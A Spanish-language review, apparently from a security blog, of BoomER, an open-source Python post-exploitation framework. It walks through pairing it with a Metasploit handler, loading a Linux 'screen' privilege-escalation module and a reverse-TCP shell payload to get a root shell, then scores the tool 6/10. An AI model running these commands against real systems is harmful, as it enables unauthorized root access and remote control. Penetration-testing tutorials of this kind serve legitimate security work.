BoomER – Una herramienta de código abierto para explotar vulnerabilidades

24 septiembre, 2019

BoomER es un framework de código abierto de Python con interfaz de línea de comandos completamente desarrollado en Python 3.X, para la explotación posterior de objetivos.

Este tiene el objetivo de explotar vulnerabilidades locales en los tres grandes sistemas operativos (Windows / Linux / Mac). La herramienta permite la interacción con software de terceros como Metasploit para encadenar ataques juntos.

Instalación

1. Dirígete al repositorio de Github

2. git clone https://github.com/Josue87/BoomER

3. cd BoomER

4. Los requisitos de instalación dependen del sistema operativo de tu computadora. Ya que estoy usando Kali lo haré con sudo pip3 install -r linuxrequirements.txt

Uso

Para explicar el uso de BoomER en este ejemplo, usamos Metasploit e intentamos realizar un ataque de explotación local en Kali usando privilegios de usuario normales

1. Ejecutamos Metasploit con el comando msfconsole o msfdb run

2. Escribimos use exploit/multi/handler

3. set LHOSt {tuip}

4. set LPORT {tupuerto}

5. Ejecutamos BoomER con el comando python3 boomer.py

6. Cargando El módulo Linux y el payload

load linux/elevation/screen_exploit

put payload msf/linux/x64/shell_reverse_tcp

7. Configuramos en BoomER el mismo LHOST y LPORT que configuramos en Metasploit

put lhost {tuip}

put lport {tupuerto}

8. Ejecutamos exploit -j -z en Metasploit y run en BoomER

9. Finalmente obtenemos nuestra Shell root

Ventajas

Totalmente personalizado
Sintaxis fácil (similar a MSF)

Desventajas

MSF ya tiene módulos locales
No está en desarrollo activo

Creo que BoomER es una herramienta poderosa con una sintaxis similar a Metasploit y funciona para explotar las vulnerabilidades locales, implementan muchos módulos que funcionan en todo tipo de sistemas operativos.

Le otorgamos 6 de 10 puntos posibles.